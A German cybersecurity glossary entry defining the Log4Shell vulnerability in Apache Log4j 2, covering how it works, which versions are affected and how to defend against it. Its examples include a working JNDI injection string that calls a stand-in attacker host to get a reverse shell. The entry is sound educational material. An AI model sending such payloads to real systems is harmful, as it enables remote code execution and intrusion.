CyberGlossary

Schwachstellen

Log4Shell (CVE-2021-44228)

Auch bekannt als: CVE-2021-44228, Log4j-Schwachstelle

Definition

Kritische Remote-Code-Execution-Schwachstelle in Apache Log4j 2 von Dezember 2021, die durch Loggen einer einzigen JNDI-Lookup-Zeichenfolge auslösbar war.

Log4Shell ist eine CVSS-10.0-Schwachstelle in Apache Log4j 2 (Versionen 2.0-beta9 bis 2.14.1), bekannt geworden im Dezember 2021. Die Message-Lookup-Funktion wertete Strings wie ${jndi:ldap://...} innerhalb von Log-Nachrichten aus, sodass die JVM eine entfernte Java-Klasse lud und deserialisierte — mit Remote-Code-Execution als Folge. Da Log4j in unzähligen Java-Anwendungen und Appliances steckt, war jede Eingabe, die im Log landete (User-Agent, Suchfeld, Dateiname), ein Angriffsvektor. Es löste weltweit eine Notfall-Patch-Welle aus und gehört zu den meistgenutzten Zero-Days. Schutz: Log4j auf 2.17.1+ upgraden, JNDI-Lookups deaktivieren, Egress blockieren, SBOMs zur Komponentensuche nutzen.

Beispiele

  • Versand von User-Agent: ${jndi:ldap://attacker.com/x} an eine Java-Webanwendung — Reverse Shell.
  • Ausnutzen eines internen Java-Dienstes durch das Loggen eines bösartigen Username-Feldes.

Verwandte Begriffe